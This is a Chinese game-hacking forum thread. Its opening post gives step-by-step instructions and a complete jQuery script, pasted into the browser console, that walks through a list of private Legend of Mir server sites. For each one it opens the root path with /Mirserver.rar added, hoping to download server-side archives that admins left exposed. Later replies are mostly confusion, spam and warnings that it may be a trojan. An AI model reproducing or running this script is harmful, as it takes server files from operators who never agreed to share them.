WPE|52wpe|我爱WPE

注册会员
搜索
  • 9840查看
  • 55回复

注册会员

这年头,传奇服实在是太多了,一天好几千个。
本方法非常非常之简单,实用!只需要用到金山公司的猎豹浏览器。
除非你幼儿园没毕业,否则对你来说小菜一碟。

开始可以随便找个网站,因为先要找服!最好如zhaosf.com, zhaokf.com,因为游戏列表多。
在这里,我们用一个在网友在论坛发布的www.momosf.com来找,用它来找传奇服,因为它里面包含很多热门找服站点的游戏列表。
并且有按广告人气排名的。这样找的服具有代表性和价值。

第1步,下载猎豹浏览器(必须要用猎豹浏览器或者淘宝浏览器带google chrome内核的,因为里面带开发者工具)
再接着在地址栏中输入:liebao://settings-frame/adblock, 取消弹出窗口拦截。

第2步,进到网站,按下F12。调出开发者工具。然后按下图中小铵钮展开代码输入框。

第3步,加载jquery,请在空白处粘贴输以下代码(这都是js代码,肯定很多人看的懂的)
o = document.createElement("script")
o.src = "http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js";
document.body.appendChild(o);

第4步,再次执行以下所有代码,尝试下载其根目录下的Mirserver.rar或者Mirserver.zip。

很多人肯定会问:你怎么晓得人家那个目录下有Mirserver.rar文件?

这我就要告诉你啦,我是不知道,不过我知道很多人通过远程桌面上传文件到服务器很慢,经常容易中断。

特别是30多兆的Mirserver.rar(传奇服务端),通过远程桌面上传到服务器是一种折磨的。

所以很多GM(包括我在内)会先把服务端通过FTP上传到网站,然后在服务器上通过浏览器1秒将服务端下载到服务器上。

本人以前笨的时候,用手输的方法尝试过200个网站,都下了将近10个服务器端。

全自动的,不需要你一个一个去试的,下面就等着收菜吧!

urlObj = {};
//所有链接
aa = $("a");
function getMirserver(link, pos) {
var strHref = link.eq(pos).attr("href");
var url1 = strHref;
//不包含http://的,跳过
if (strHref.indexOf("http://") == -1) {
return;
}
//已经尝试过的,跳过
if (urlObj[strHref]) {
return;
}

strHref = strHref.replace("http://", "");
if (strHref.indexOf("/") > -1) {
strHref = strHref.substring(0, strHref.indexOf("/"));
}
//客户端地址
var url = "http://"+strHref+"/Mirserver.rar";
var o = window.open("about:blank");
o.location.href = url;
//为html状态则关闭
o.onload = function(){checkIsFinish(); o.close();}
var checkIsFinish = function() {
if (pos > 0) {
getMirserver(link, pos-1);
}
}
//不存在则关闭,存在则跳提示
setTimeout(function(){
if (!o.document) {
//检查状态
checkIsFinish(); o.location.href = url1; o.alert = function(){};
setTimeout(function(){console.log(url1 + "网站正常,但没找到Mirserver.rar");o.close();}, 2000);
}
else {checkIsFinish(); console.log(url1 + "找到Mirserver.rar"); o.alert("恭喜,找到一个,您可以点击保存下载"); o.close();}
},5000);
}
getMirserver(aa, aa.length - 1);

中级会员

不懂   你这是挖端还是什么

注册会员

当然是挖端了啊,

新手上路

不懂,求大神教教 本人口口 345206510

新手上路

骗人的,草。大家别上当

金牌会员

还有别的网站吗?

金牌会员

作为一个新人,我发现要看到更有用   的帖子,必须权限要高,所以我每看一个帖子,都会顶一下,这样权限就慢慢的高了。

金牌会员

,我是个菜鸟看不懂啊,谢谢好新人哇

金牌会员

这个方法还真是没试过,学习了

中级会员

这个又是什么啊不清楚哦

注册会员

不懂。。求解

注册会员

不懂不坑人

中级会员

基本上的新人帖 大家还是不要太相信..很可能是木马

新手上路

看不懂,求解释

注册会员

楼主的帖子怎么样?赶紧试试这里的快速回复给楼主点评论吧我也是每天看贴无数,基本上不回贴. 后来发现这样很傻,很多比我注册晚的人金币都比我多,于是我就把这段文字保存在记事本里,每看一贴就复制粘贴一次.顺便帮lz把贴我也是每天看贴无数,基本上不回贴. 后来发现这样很傻,很多比我注册晚的人金币我也是每天看贴无数,基本上不回贴. 后来发现这样很傻,很多比我注册晚的人金币都比我多,于是我就把这段文字保存在记事本里,每看一贴就复制粘贴一次.顺便帮lz把贴子顶上去” 我现在觉悟了,为什么不回帖赚点金币呢都比我多,于是我就把这段文字保存在记事本里,每看一贴就复制粘贴一次.顺便帮lz把贴子顶上去” 我现在觉悟了,为什么不回帖赚点金币呢子顶上去” 我现在觉悟了,为什么不回帖赚点金币呢

注册会员

一看就不是什么好贴,果断不理

中级会员

顶顶路过也要看看的

中级会员

我也是每天看贴无数,基本上不回贴. 后来发现这样很傻,很多比我注册晚的人金币都比我多,于是我就把这段文字保存在记事本里,每看一贴就复制粘贴一次.顺便帮lz把贴子顶上去” 我现在觉悟了,为什么不回帖赚点金币呢

注册会员

没有看明白  还能在描述详细点么?

中级会员

jinlzhf 发表于 2014-1-10 19:28
作为一个新人,我发现要看到更有用   的帖子,必须权限要高,所以我每看一个帖子,都会顶一下,这样权限就慢 ...

努力升级,看贴必回。
- 本文出自WPE|52wpe|我爱WPE,原文地址:http://bbs.52wpe.com/thread-386304-1-1.html

快速发帖